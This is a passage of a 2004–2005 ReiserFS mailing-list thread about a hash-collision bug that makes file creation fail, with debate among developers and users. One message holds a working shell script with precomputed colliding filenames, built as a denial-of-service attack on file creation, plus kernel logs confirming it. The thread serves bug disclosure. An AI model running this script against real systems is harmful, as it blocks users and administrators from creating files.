* Congratulations! we have got hash function screwed up
@ 2004-12-28 22:12 Lehmann
2004-12-29 18:55 ` Stefan Traby
2005-01-06 12:45 ` Alex Zarochentsev
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2004-12-28 22:12 UTC (permalink / raw)
To: reiserfs-list; +Cc: stefan
Hi!
When trying to upgrade or reinstall the xfonts-75dpi,
xfonts-75dpi-transcoded or 100dpi & transcoded debian packages on my
2.6.10-rc3 amd64 reiserfsv3 host, I get the following errors:
dpkg: error processing
/var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb (--unpack):
unable to make backup link of
`./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-1.pcf.gz' before
installing new version: Device or resource busy
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Preparing to replace xfonts-75dpi-transcoded 4.3.0.dfsg.1-10 (using
.../xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb) ...
dpkg: error processing /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb (--unpack):
unable to make backup link of `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-10.pcf.gz' before installing new version: Device or resource busy
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Errors were encountered while processing:
/var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb
/var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb
And at the same time, I get this in my kernel log:
ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
generic bug in handling hash collisions?
Deleteing the fonts and installing the package works, but the next upgrade
makes the error appear again.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
@ 2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
2005-01-06 12:45 ` Alex Zarochentsev
1 sibling, 2 replies; 26+ messages in thread
From: Stefan Traby @ 2004-12-29 18:55 UTC (permalink / raw)
To: Marc A. Lehmann ; +Cc: reiserfs-list, stefan
On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
> ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
>
> Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> generic bug in handling hash collisions?
I can confirm that with 2.6.10.
It is independent of hash function (r5, rupasov, tea) used.
Here a script that works independent of hash (feel free to forward it to
bugtraq - it's a showstopper bug):
#! /bin/sh
# reiserfs v3 denial of "00000000" creation attack (hash collisions)
# insider: EHASHCOLLISION EAGAIN!
#
ATTACK=00000000
R5="
000003435823 000022067556 000040799289 000047672563 000079051844 000097783577
000119162858 000125037032 000137894590 000156516313 000169273871 000175148046
000193879879 000209384885 000228006608 000246738340 000252611615 000259495899
000278117621 000296849354 000305480087 000311354361 000318228635 000342833642
000361465375 000374212923 000392944656 000401576389 000414323937 000439929944
000445803118 000464434950 000470309125 000483066683 000504545964 000523177697
000560530152 000567404427 000573288700 000598893708 000600641166 000607515440
000626147173 000632020447 000657626454 000676258187 000689005735 000729116749
000747848481 000753721756 000779227762 000797959495 000806590218 000819338776
000843943783 000862575506 000888080512 000921308252 000934065800 000946913259
000952797533 000971419266 000984176814 001008625581 001027257304 001033130588
001051862310 001058736595 001070494043 001077368318 001117479331 001136100064
001148958612 001154831897 001160706070 001186211078 001213574633 001226322091
001257801372 001263685647 001289190653 001295064928 001303796660 001316544109
001322418393 001335175941 001366655122 001385286955 001406766136 001425397969
001431271143 001462750424 001481382157 001502861438 001509735712 001521493170
001528367445 001534240719 001552972451 001559846726 001578478459 001611705198
001618589472 001661816201 001687321209 001714684774 001727432222 001758911503
001764795788 001777543236 001783417510 001823528524 001849033530 001867765263
001873639538 001892270270 001907876277 001932381284 001945129832 001951003007
001963860565 001976609013 001982492298 002012815329 002019699603 002031447061
002038320336 002050078894 002062926342 002081558075"
RUPASOV="
000000000000 000016777216 000033554432 000050331648 000067108864 000083886080
000100663296 000117440512 000134217728 000150994944 000167772160 000184549376
000201326592 000218103808 000234881024 000251658240 000268435456 000285212672
000301989888 000318767104 000335544320 000352321536 000369098752 000385875968
000402653184 000419430400 000436207616 000452984832 000469762048 000486539264
000503316480 000520093696 000536870912 000553648128 000570425344 000587202560
000603979776 000620756992 000637534208 000654311424 000671088640 000687865856
000704643072 000721420288 000738197504 000754974720 000771751936 000788529152
000805306368 000822083584 000838860800 000855638016 000872415232 000889192448
000905969664 000922746880 000939524096 000956301312 000973078528 000989855744
001006632960 001023410176 001040187392 001056964608 001073741824 001090519040
001107296256 001124073472 001140850688 001157627904 001174405120 001191182336
001207959552 001224736768 001241513984 001258291200 001275068416 001291845632
001308622848 001325400064 001342177280 001358954496 001375731712 001392508928
001409286144 001426063360 001442840576 001459617792 001476395008 001493172224
001509949440 001526726656 001543503872 001560281088 001577058304 001593835520
001610612736 001627389952 001644167168 001660944384 001677721600 001694498816
001711276032 001728053248 001744830464 001761607680 001778384896 001795162112
001811939328 001828716544 001845493760 001862270976 001879048192 001895825408
001912602624 001929379840 001946157056 001962934272 001979711488 001996488704
002013265920 002030043136 002046820352 002063597568 002080374784 002097152000
002113929216 002130706432 002147483648 002164260864"
TEA="
000004464160 000041804440 000080240100 000091329029 000104181015 000113725885
000126527488 000140392446 000158910938 000228997445 000230956744 000265118409
000278488948 000294393023 000295253722 000300066283 000302103786 000330187358
000345002932 000351581026 000363320013 000366148241 000398298703 000411084407
000430270876 000450889104 000457353842 000459620112 000464658163 000465039241
000472966466 000479773493 000485638992 000490029225 000519300138 000523222490
000543871739 000550161091 000614863063 000628859470 000658101403 000705881242
000707428465 000709541412 000710835913 000712765852 000747815906 000751391777
000758206682 000759473821 000761493018 000807141251 000819925766 000822342439
000844968698 000846939644 000856679997 000862332598 000897273990 000903164600
000959685453 000966591643 000975714799 001026819859 001030872126 001052008464
001101513177 001111878931 001114914486 001126417564 001134342742 001145636506
001156983946 001160376993 001181076193 001187045552 001229906330 001237307675
001240018281 001248584794 001258422117 001295880517 001329389368 001334233160
001350505390 001377143821 001393244657 001501373481 001530260023 001544062865
001610909439 001642156853 001659354644 001663482837 001665935205 001709618183
001759947280 001787829412 001793154973 001822800512 001896514533 001927905568
001943169212 001959135151 001971173446 001990765252 001994429464 002029003899
002067143236 002083825957 002092102503 002097735725 002117257216 002119310814
002135908515 002158320625 002167193043 002172339658 002184965785 002188948362
002206033194 002206592488 002207146649 002209003597 002219996827 002235862165
002237358329 002267747802 002273109830 002284855435"
for i in $RUPASOV $R5 $TEA ; do
touch $i
done
touch $ATTACK
if [ \! -f $ATTACK ] ; then
echo "FATAL: can't create $ATTACK"
fi
rm -f $RUPASOV $R5 $TEA
Dec 28 23:38:24 kotzmaster kernel: ReiserFS: loop0: Using rupasov hash to sort names
Dec 29 00:38:59 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Dec 29 00:40:17 kotzmaster kernel: ReiserFS: loop0: Using tea hash to sort names
Dec 29 00:40:22 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
Dec 29 00:41:16 kotzmaster kernel: ReiserFS: loop0: Using r5 hash to sort names
Dec 29 00:41:23 kotzmaster kernel: ReiserFS: loop0: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
--
ciao -
Stefan
" GNU's Not Unix -- IIS Isn't Secure "
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 18:55 ` Stefan Traby
@ 2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
1 sibling, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 21:04 UTC (permalink / raw)
To: Stefan Traby; +Cc: reiserfs-list
On Wed, Dec 29, 2004 at 07:55:29PM +0100, Stefan Traby <stefan@hello-penguin.com> wrote:
> On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
>
> > ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
> >
> > Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> > generic bug in handling hash collisions?
>
> I can confirm that with 2.6.10.
> It is independent of hash function (r5, rupasov, tea) used.
Interesting, I would have hoped it's not so easy to generate
collisions. Now that a debian package creates collisions, this issue has
become very real.
Another note: It seems that the error returned is wrong. I would expect
ENOSPC if reiserfs runs out of (key-)space, not EBUSY or whatever it
returns.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
@ 2004-12-29 21:05 ` Hans Reiser
2004-12-29 21:43 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2004-12-29 21:05 UTC (permalink / raw)
To: Stefan Traby; +Cc: Marc A. Lehmann, reiserfs-list
Stefan Traby wrote:
>
>
>Here a script that works independent of hash (feel free to forward it to
>bugtraq - it's a showstopper bug):
>
>
It is not independent of hash, it is hardcoded to be hash specific. It
is not a showstopper bug --- almost nobody cared about it for the last 5
years. If you don't accept that quality of service condition on
filename creation, use reiser4 or ext3.
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:05 ` Hans Reiser
@ 2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
2004-12-30 2:05 ` Hans Reiser
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 21:43 UTC (permalink / raw)
To: Hans Reiser; +Cc: Stefan Traby, reiserfs-list
On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> Stefan Traby wrote:
>
> >
> >
> >Here a script that works independent of hash (feel free to forward it to
> >bugtraq - it's a showstopper bug):
> >
> >
> is not a showstopper bug
If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
xfonts-100 are not unimportant packages), I'd call this a showstopper
indeed *g*.
> --- almost nobody cared about it for the last 5
> years.
This is a lame excuse for a bug - after all, you promoted reiserfs of being
capable of storing many files in one directory instead of having to rely on
directory hierarchies for e.g. squid and other apps. But exactly that is not
possible with reiserfs, as too many files in one directory == collisions.
Also, it's a lie that nobody cared about this, after all, there ahd been
earlier reports.
And last not least, most apps do not create many files in one directory by
default, for compatibility with other filesystems, where this is too slow.
> If you don't accept that quality of service condition on filename
> creation,
Again, this is a lame excuse for a bug. First you declare some features on
your filesystem, later, when it turns out that it isn't being delivered,
you act as if this were a known condition.
(Even if it were ok to fail file creation, the error generated is still
wrong. It is a bug, no matter how you try to twist it).
> use reiser4 or ext3.
reiser4, is, of course, far from being stable enough for such uses still.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:43 ` Lehmann
@ 2004-12-29 21:46 ` Christian Iversen
2004-12-29 22:27 ` Lehmann
2004-12-30 2:05 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: Christian Iversen @ 2004-12-29 21:46 UTC (permalink / raw)
To: reiserfs-list
On Wednesday 29 December 2004 22:43, pcg@goof.com ( Marc) (A.) (Lehmann )
wrote:
> On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com>
wrote:
> > Stefan Traby wrote:
> > >Here a script that works independent of hash (feel free to forward it to
> > >bugtraq - it's a showstopper bug):
> >
> > is not a showstopper bug
>
> If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
> xfonts-100 are not unimportant packages), I'd call this a showstopper
> indeed *g*.
Under what conditions does this occur? I have 5 installs of debian linux on
reiserfs here at home, and I have never had such problems. Is it only in
directories with thousands of other files?
--
Regards,
Christian Iversen
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:46 ` Christian Iversen
@ 2004-12-29 22:27 ` Lehmann
0 siblings, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-29 22:27 UTC (permalink / raw)
To: Christian Iversen; +Cc: reiserfs-list
On Wed, Dec 29, 2004 at 10:46:46PM +0100, Christian Iversen <chrivers@iversen-net.dk> wrote:
> > On Wed, Dec 29, 2004 at 01:05:38PM -0800, Hans Reiser <reiser@namesys.com>
> wrote:
> > > Stefan Traby wrote:
> > > >Here a script that works independent of hash (feel free to forward it to
> > > >bugtraq - it's a showstopper bug):
> > >
> > > is not a showstopper bug
> >
> > If it keeps debian from being usable on reiserfs (mind you, xfonts-75 and
> > xfonts-100 are not unimportant packages), I'd call this a showstopper
> > indeed *g*.
>
> Under what conditions does this occur?
Under the conditions that I already wrote about: when upgrading an
existing xfonts-75dpi package. Installing works fine, upgrading does not,
presumably because dpkg creates a backup copy of every file upgraded
first, which then exceeds some internal reiserfs limit.
> I have 5 installs of debian linux on
> reiserfs here at home, and I have never had such problems. Is it only in
> directories with thousands of other files?
As I understands the bug, it happens when too many filenames in the same
directory happen to hash to the same file - reiserfs requires the hash of
filenames to be "unqiue enough", otherwise it will not be able to create
more files with the same hashed name.
As the examples show, getting collisions is pretty straightforward and
easy, even with the tea hash (I can faintly remember hans reiser claiming
that this bug has been solved some years ago, and indeed this is the first
time it really bites me, albeit with a very real example).
As such, reiserfs v3 is not suitable for server operations, where such
irregular behaviour simply must not occur - consider this happening when
installing a kernel package, leaving your system in a non-bootable state
or so.
My specific case might depend on other packages - as I maintain some
i18n'ed software I have lots of extra font packages installed, although
I doubt many of them will end up in the 75dpi directory, but it might
be that my 75dpi and 100dpi dirs might be somewhat crowded - they both
contain 1888 files with similar names (and the standard hash, r5, is very
susceptible to similar names leading to similar hashes).
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
@ 2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
1 sibling, 2 replies; 26+ messages in thread
From: Hans Reiser @ 2004-12-30 2:05 UTC (permalink / raw)
To: reiserfs-list; +Cc: Stefan Traby
pcg( Marc)@goof(A.).(Lehmann )com wrote:
>
>
>Again, this is a lame excuse for a bug. First you declare some features on
>your filesystem, later, when it turns out that it isn't being delivered,
>you act as if this were a known condition.
>
>
Well this is true, you are right. Reiser4 is the fix though.
>(Even if it were ok to fail file creation, the error generated is still
>wrong. It is a bug, no matter how you try to twist it).
>
>
Blame Alan Cox for that, he changed it from -EHASHCOLLISION (or some
such error I invented, I forget) over my objections.
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-30 2:05 ` Hans Reiser
@ 2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
1 sibling, 0 replies; 26+ messages in thread
From: Matthias Andree @ 2004-12-30 10:22 UTC (permalink / raw)
To: Hans Reiser; +Cc: reiserfs-list, Stefan Traby
Hans Reiser <reiser@namesys.com> writes:
>>Again, this is a lame excuse for a bug. First you declare some features on
>>your filesystem, later, when it turns out that it isn't being delivered,
>>you act as if this were a known condition.
>>
> Well this is true, you are right. Reiser4 is the fix though.
No, it isn't. Reiser4 is an alternative beast. Or will it transparently
"fix" the collision problem in a 3.5 or 3.6 file system, in a way that
is backwards compatible with 3.6 drivers? If not, please fix reiser3.6.
Given that Reiser4 isn't "proven" yet in the field (for that, it would
have to be used as the default file system by at least one major
distributor for at least a year), it is certainly not an option for
servers _yet_.
A file system that intransparently (i. e. not inode count or block
count) refuses to create a new file doesn't belong on _my_ production
machines, which shall migrate away from reiserfs on the next suitable
occasion (such as upgrades). There's ext3fs, jfs, xfs, and in 2006 or
2007, we'll talk about reiser4 again. Yes, I am conservative WRT file
systems and storage.
--
Matthias Andree
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
@ 2004-12-30 17:02 ` Lehmann
1 sibling, 0 replies; 26+ messages in thread
From: Lehmann @ 2004-12-30 17:02 UTC (permalink / raw)
To: Hans Reiser; +Cc: reiserfs-list, Stefan Traby
On Wed, Dec 29, 2004 at 06:05:59PM -0800, Hans Reiser <reiser@namesys.com> wrote:
> >
> >Again, this is a lame excuse for a bug. First you declare some features on
> >your filesystem, later, when it turns out that it isn't being delivered,
> >you act as if this were a known condition.
> >
> >
> Well this is true, you are right. Reiser4 is the fix though.
So that what happens to the filesystems develop once you have a new toy. Good
to know when planning my next server :)
> >(Even if it were ok to fail file creation, the error generated is still
> >wrong. It is a bug, no matter how you try to twist it).
> >
> Blame Alan Cox for that, he changed it from -EHASHCOLLISION (or some
> such error I invented, I forget) over my objections.
Blaming Cox for trying to fix your code and not getting it completely
right is not nice. After all, Cox also found that the error code is
inadequate. The point is that EBUSY is still bad, for open. ENOSPC is a
much better code, as it is a documented error code for open, whereas EBUSY
is not.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
2004-12-29 18:55 ` Stefan Traby
@ 2005-01-06 12:45 ` Alex Zarochentsev
2005-01-06 14:27 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Alex Zarochentsev @ 2005-01-06 12:45 UTC (permalink / raw)
To: Marc A. Lehmann ; +Cc: reiserfs-list, stefan
Hello,
On Tue, Dec 28, 2004 at 11:12:18PM +0100, Marc A. Lehmann wrote:
> Hi!
>
> When trying to upgrade or reinstall the xfonts-75dpi,
> xfonts-75dpi-transcoded or 100dpi & transcoded debian packages on my
> 2.6.10-rc3 amd64 reiserfsv3 host, I get the following errors:
>
> dpkg: error processing
> /var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb (--unpack):
> unable to make backup link of
> `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-1.pcf.gz' before
> installing new version: Device or resource busy
> dpkg-deb: subprocess paste killed by signal (Broken pipe)
> Preparing to replace xfonts-75dpi-transcoded 4.3.0.dfsg.1-10 (using
> .../xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb) ...
> dpkg: error processing /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb (--unpack):
> unable to make backup link of `./usr/X11R6/lib/X11/fonts/75dpi/lutBS19-ISO8859-10.pcf.gz' before installing new version: Device or resource busy
> dpkg-deb: subprocess paste killed by signal (Broken pipe)
> Errors were encountered while processing:
> /var/cache/apt/archives/xfonts-75dpi_4.3.0.dfsg.1-10_all.deb
> /var/cache/apt/archives/xfonts-75dpi-transcoded_4.3.0.dfsg.1-10_all.deb
>
> And at the same time, I get this in my kernel log:
>
> ReiserFS: hdg2: warning: reiserfs_add_entry: Congratulations! we have got hash function screwed up
>
> Sure sounds like a filesystem bug to me. Is this 2.6.10-rc3-specific or a
> generic bug in handling hash collisions?
Tea hash is designed to be more resistant.
there is a generic problem with overloading of the generation counter, but
tea hash should mix file names better and have less chances to 'screw the hash
function up'.
Does the debian install all X font files into one dir? May be you have your own
font files installed in the same dir? I suggest to split the dir into several
ones.
> Deleteing the fonts and installing the package works, but the next upgrade
> makes the error appear again.
>
> --
> The choice of a
> -----==- _GNU_
> ----==-- _ generation Marc Lehmann
> ---==---(_)__ __ ____ __ pcg@goof.com
> --==---/ / _ \/ // /\ \/ / http://schmorp.de/
> -=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
--
Alex.
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 12:45 ` Alex Zarochentsev
@ 2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
0 siblings, 2 replies; 26+ messages in thread
From: Lehmann @ 2005-01-06 14:27 UTC (permalink / raw)
To: Alex Zarochentsev; +Cc: reiserfs-list, stefan
On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
> > generic bug in handling hash collisions?
>
> Tea hash is designed to be more resistant.
As the example posted shows, tea doesn't look better, it generates
nicely-looking collisions, too.
> Does the debian install all X font files into one dir?
No, but xfree nowadays comes with a lot of fonts because it stupidly makes
a copy of about each and every font in each and every encoding, leading to
many font files in the bitmapped category (75dpi and 100dpi).
> May be you have your own font files installed in the same dir?
I also have some other debian packages that install their fonts there, but
it should be less than 10 extra files.
> I suggest to split the dir into several ones.
I'd suggest getting rid of reiserfs on anything important. I can't have it
when my filesystem randomly returns errors when it should be working.
I wonder wether this hasn't any security relevance, as it allows attackers
easily to create filename holes in the filesystem that even root cannot
override.
Thanks for the suggestion, though! However, the workaround I currently use
(delete the dir, reinstall) works better, as it doesn't destroy debian's
idea of the filesystem layout.
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 14:27 ` Lehmann
@ 2005-01-06 15:56 ` Hans Reiser
2005-01-06 16:13 ` Spam
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
1 sibling, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-06 15:56 UTC (permalink / raw)
To: reiserfs-list; +Cc: Alex Zarochentsev, stefan
pcg( Marc)@goof(A.).(Lehmann )com wrote:
>On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
>
>
>>>generic bug in handling hash collisions?
>>>
>>>
>>Tea hash is designed to be more resistant.
>>
>>
>
>As the example posted shows, tea doesn't look better, it generates
>nicely-looking collisions, too.
>
>
You mean, in practice you hit them, or with an artificially generated
set of filenames intended to cause collisions you get those collisions?
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 15:56 ` Hans Reiser
@ 2005-01-06 16:13 ` Spam
2005-01-06 16:26 ` Chris Dukes
0 siblings, 1 reply; 26+ messages in thread
From: Spam @ 2005-01-06 16:13 UTC (permalink / raw)
To: reiserfs-list
>>>>generic bug in handling hash collisions?
>>>>
>>>>
>>>Tea hash is designed to be more resistant.
>>>
>>>
>>
>>As the example posted shows, tea doesn't look better, it generates
>>nicely-looking collisions, too.
>>
>>
> You mean, in practice you hit them, or with an artificially generated
> set of filenames intended to cause collisions you get those collisions?
Excuse me, but do you mean that there are undocumented limits on what
files can be named to, and how many files with similar or random
names in a ReiferFS volume?
This sounds bad...
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:13 ` Spam
@ 2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
2005-01-07 17:22 ` Hans Reiser
0 siblings, 2 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-06 16:26 UTC (permalink / raw)
To: Spam; +Cc: reiserfs-list
On Thu, Jan 06, 2005 at 05:13:23PM +0100, Spam wrote:
> >>>>generic bug in handling hash collisions?
> >>>>
> >>>>
> >>>Tea hash is designed to be more resistant.
> >>>
> >>>
> >>
> >>As the example posted shows, tea doesn't look better, it generates
> >>nicely-looking collisions, too.
> >>
> >>
> > You mean, in practice you hit them, or with an artificially generated
> > set of filenames intended to cause collisions you get those collisions?
>
> Excuse me, but do you mean that there are undocumented limits on what
> files can be named to, and how many files with similar or random
> names in a ReiferFS volume?
No, I'd say it's pretty well documented that reiserfs fails under
certain hash collision conditions instead of continueing to work
(albeit more slowly).
The nature of the hash collisions must be pretty obvious if a shell
script can be written to demonstrate the problem.
>
> This sounds bad...
It's a risk assessment. What are the odds of your normal data sets
hitting the bug or of someone with malicious intent introducing
a demonstration program vs the performance hit of a filesystem
without the problem.
All filesystems will fail or suffer degraded performance under
certain conditions, you need to determine what conditions are acceptable
for your data.
--
Chris Dukes
Warning: Do not use the reflow toaster oven to prepare foods after
it has been used for solder paste reflow.
http://www.stencilsunlimited.com/stencil_article_page5.htm
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:26 ` Chris Dukes
@ 2005-01-06 16:29 ` Spam
2005-01-06 16:56 ` Chris Dukes
2005-01-07 17:22 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: Spam @ 2005-01-06 16:29 UTC (permalink / raw)
To: reiserfs-list
> On Thu, Jan 06, 2005 at 05:13:23PM +0100, Spam wrote:
>> >>>>generic bug in handling hash collisions?
>> >>>>
>> >>>>
>> >>>Tea hash is designed to be more resistant.
>> >>>
>> >>>
>> >>
>> >>As the example posted shows, tea doesn't look better, it generates
>> >>nicely-looking collisions, too.
>> >>
>> >>
>> > You mean, in practice you hit them, or with an artificially generated
>> > set of filenames intended to cause collisions you get those collisions?
>>
>> Excuse me, but do you mean that there are undocumented limits on what
>> files can be named to, and how many files with similar or random
>> names in a ReiferFS volume?
> No, I'd say it's pretty well documented that reiserfs fails under
> certain hash collision conditions instead of continueing to work
> (albeit more slowly).
> The nature of the hash collisions must be pretty obvious if a shell
> script can be written to demonstrate the problem.
>>
>> This sounds bad...
> It's a risk assessment. What are the odds of your normal data sets
> hitting the bug or of someone with malicious intent introducing
> a demonstration program vs the performance hit of a filesystem
> without the problem.
How can I assess the risk, if I do not know how to produce the bugs?
You say certain conditions. But from what I read earlier in the
thread, a directory with a fonts in them.....?
> All filesystems will fail or suffer degraded performance under
> certain conditions, you need to determine what conditions are acceptable
> for your data.
Slow can be acceptable. But failing? No, a filesystem should not
fail.
--
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:29 ` Spam
@ 2005-01-06 16:56 ` Chris Dukes
0 siblings, 0 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-06 16:56 UTC (permalink / raw)
To: Spam; +Cc: reiserfs-list
On Thu, Jan 06, 2005 at 05:29:39PM +0100, Spam wrote:
>
> > It's a risk assessment. What are the odds of your normal data sets
> > hitting the bug or of someone with malicious intent introducing
> > a demonstration program vs the performance hit of a filesystem
> > without the problem.
>
> How can I assess the risk, if I do not know how to produce the bugs?
> You say certain conditions. But from what I read earlier in the
> thread, a directory with a fonts in them.....?
Since the concepts of simulators, hash function analysis, and dataset
modelling seem to escape you, perhaps you need to go for the black
and white "Is any risk acceptable," given anecdotal data of one
unexpected failing condition and one script that can regularly create
the failing condition.
>
> > All filesystems will fail or suffer degraded performance under
> > certain conditions, you need to determine what conditions are acceptable
> > for your data.
>
> Slow can be acceptable. But failing? No, a filesystem should not
> fail.
It should not fail
1) When media fails
2) When transport hardware is not compliant with specs (permanently on
write caching anyone?)
3) Media has a limited lifetime
...
One thing I don't think I ever saw in this thread was
1) How old was the drive that saw the problem.
2) What was the drive lifetime used to calculate it's MTBF.
--
Chris Dukes
Warning: Do not use the reflow toaster oven to prepare foods after
it has been used for solder paste reflow.
http://www.stencilsunlimited.com/stencil_article_page5.htm
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
@ 2005-01-06 18:55 ` Edward Shishkin
2005-01-07 17:26 ` Lehmann
1 sibling, 1 reply; 26+ messages in thread
From: Edward Shishkin @ 2005-01-06 18:55 UTC (permalink / raw)
To: pcg; +Cc: Alex Zarochentsev, reiserfs-list, stefan
pcg( Marc)@goof(A.).(Lehmann )com wrote:
>On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev <zam@namesys.com> wrote:
>
>
>>>generic bug in handling hash collisions?
>>>
>>>
>>Tea hash is designed to be more resistant.
>>
>>
Actually this can not be more resistant as it use the same 32-bit output
size. So to find
a collision you just need to find hashes of 2^16 = 65536 random documents.
>
>As the example posted shows, tea doesn't look better, it generates
>nicely-looking collisions, too.
>
>
>
>I'd suggest getting rid of reiserfs on anything important. I can't have it
>when my filesystem randomly returns errors when it should be working.
>
>I wonder wether this hasn't any security relevance, as it allows attackers
